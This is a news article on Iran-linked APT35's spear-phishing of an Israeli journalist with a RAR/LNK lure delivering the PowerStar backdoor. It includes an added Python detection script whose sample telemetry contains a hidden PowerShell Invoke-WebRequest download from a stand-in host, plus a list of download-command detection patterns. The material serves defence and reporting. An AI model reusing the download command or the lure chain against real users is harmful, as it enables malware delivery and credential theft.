CyberSecurity SEE

Iran-Linked APT35 Enhances Spear-Phishing Tools to Target Israeli Media

APT35, also known as Charming Kitten, Imperial Kitten, or Tortoiseshell, an Iran-linked threat group, has recently upgraded its cyberattack capabilities with enhanced methods to conceal its activities. Additionally, the group has developed an upgraded custom backdoor that is being distributed through spear-phishing campaigns.

The main objective of APT35 is to collect intelligence by compromising account credentials and gaining access to the email accounts of targeted individuals. Recently, the group attempted a highly targeted spear-phishing campaign against an Israeli journalist. The attack involved the use of a “draft report” lure, which was a password-protected RAR file containing a malicious LNK file that downloaded the upgraded backdoor.

Before sending the malware to the victim, the attackers engaged in a series of interactions to establish a sense of legitimacy. They initially asked the target if they would be open to reviewing a document related to US foreign policy. The target agreed, and the attackers continued the interaction with another benign email containing a list of questions. After several days of seemingly legitimate communication, the attackers finally sent the malware-infected “draft report.”

Toby Lewis, the global head of threat analysis at Darktrace, commented on the targeting profile of APT35, stating that it aligns with what one would expect from a group associated with the Iranian government. He emphasized the group’s focus on being bespoke, stealthy, and under the radar, which requires sophisticated social engineering methods to maximize their success.

During this recent campaign, APT35 distributed the PowerStar malware, which is an updated version of its previously known backdoor called CharmPower. The malware was delivered through an email containing a password-protected RAR file with an LNK file inside. When executed, the LNK file downloaded PowerStar from a hosting provider called Backblaze and sent a small amount of system information to a command-and-control (C2) address.
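The delivery chain described above (password-protected RAR, an LNK inside it, a script host fetching the backdoor from a cloud hosting provider, then a small beacon to C2) is detectable from ordinary endpoint telemetry without any sample of PowerStar. The following is an added example written for this page, not Volexity's or Darktrace's tooling: it correlates constructed Sysmon-style process-creation and network-connection events per process and raises an alert only when several weak signals line up on the same process. The event field names, the archive temp-folder patterns and the `b2.example` storage domain are assumptions chosen for the example; in a real deployment the cloud-storage suffix list would hold the provider's actual download domains, and legitimate traffic to them is expected, which is why that signal alone never alerts.

```python
"""Correlate LNK -> script host -> cloud download chain from endpoint telemetry.

Added example (hypothetical field names and patterns); not code from the article
or from the vendors it quotes.
"""
import json
import re
from collections import defaultdict

# Windows script hosts an LNK target commonly points at.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Download primitives that stand out in a command line launched from Explorer.
DOWNLOAD_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin|https?://)",
    re.I)

# Temp folders used when a file is opened straight out of an archive
# (assumed patterns; tune to the archivers present in your estate).
ARCHIVE_TEMP = re.compile(r"\\(Rar\$|Temp1_)", re.I)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(evt: dict, cloud_suffixes) -> list:
    """Return the list of weak signals a single event contributes."""
    reasons = []
    image = _basename(evt.get("image", ""))
    if evt["event"] == "process_create":
        parent = _basename(evt.get("parent_image", ""))
        cmd = evt.get("command_line", "")
        cwd = evt.get("current_directory", "")
        if image in SCRIPT_HOSTS and parent == "explorer.exe":
            reasons.append("script host launched from Explorer (LNK double-click pattern)")
        if DOWNLOAD_MARKERS.search(cmd):
            reasons.append("download primitive in command line")
        if ARCHIVE_TEMP.search(cwd) or ARCHIVE_TEMP.search(cmd):
            reasons.append("running from an archive extraction temp folder")
    elif evt["event"] == "network_connect":
        host = evt.get("dest_host", "").lower()
        if image in SCRIPT_HOSTS and any(
                host == s or host.endswith("." + s) for s in cloud_suffixes):
            reasons.append("script host connecting to cloud object storage")
    return reasons


def find_suspicious_chains(lines, cloud_suffixes, threshold: int = 2) -> dict:
    """Group signals by PID; a process with >= threshold distinct signals is an alert."""
    per_pid = defaultdict(list)
    for line in lines:
        evt = json.loads(line)
        for reason in score_event(evt, cloud_suffixes):
            if reason not in per_pid[evt["pid"]]:
                per_pid[evt["pid"]].append(reason)
    return {pid: rs for pid, rs in per_pid.items() if len(rs) >= threshold}


# Constructed sample telemetry (JSON lines). PID 4100 mimics the described chain;
# PID 5200 is an analyst opening an interactive shell; PID 6000 is a browser
# fetching from the same storage domain, which must not alert.
SAMPLE_EVENTS = r"""
{"event":"process_create","pid":4100,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"powershell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest https://files.b2.example/draft_report.txt\"","current_directory":"C:\\Users\\analyst\\AppData\\Local\\Temp\\Rar$DIa0.123\\"}
{"event":"network_connect","pid":4100,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dest_host":"files.b2.example"}
{"event":"process_create","pid":5200,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"powershell.exe -NoProfile","current_directory":"C:\\Users\\analyst\\"}
{"event":"network_connect","pid":6000,"image":"C:\\Program Files\\Browser\\browser.exe","dest_host":"files.b2.example"}
""".strip().splitlines()

if __name__ == "__main__":
    for pid, reasons in find_suspicious_chains(SAMPLE_EVENTS, ["b2.example"]).items():
        print(f"ALERT pid={pid}")
        for r in reasons:
            print(f"  - {r}")
```

Run as-is, only PID 4100 alerts, with all four signals; the interactive shell (one signal) and the browser download (no signal, since a browser is not a script host) stay quiet. The threshold is the knob to tune against your own baseline: the Explorer-parent and archive-temp-folder signals fire on plenty of benign activity individually, so the value of this rule is in the conjunction, not in any single condition.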

According to Volexity, the variant of PowerStar used in this campaign is particularly complex and likely supported by a custom server-side component. This component automates simple actions for the malware operator and downloads a decryption function from remotely hosted files, making it harder to detect and analyze the malware.

Lewis highlighted the varying levels of sophistication among APT groups and their motivations for achieving a return on their investment. He explained that some groups may rely on unsophisticated campaigns, while others develop their own zero-day exploits and demonstrate expertise in infrastructure management and control.

Volexity researchers stated that they frequently observe operations from APT35 but find that the group rarely deploys malware as part of their attacks. This sparing use of malware makes it more challenging to track their activities and adds to the group’s sophistication.

APT35 has been active for over a decade and has conducted extensive campaigns against organizations and officials in North America and the Middle East. Public attribution identifies APT35 as an Iran-based nation-state threat actor. Recent campaigns by the group have raised concerns about Iran’s potential physical targeting of dissenters for kidnapping and other kinetic operations.

The continuous evolution and upgrade of APT35’s cyberattack capabilities highlight the persistent threat that nation-state-sponsored groups pose to organizations and individuals worldwide. These developments emphasize the importance of implementing robust cybersecurity measures to detect and mitigate such threats.
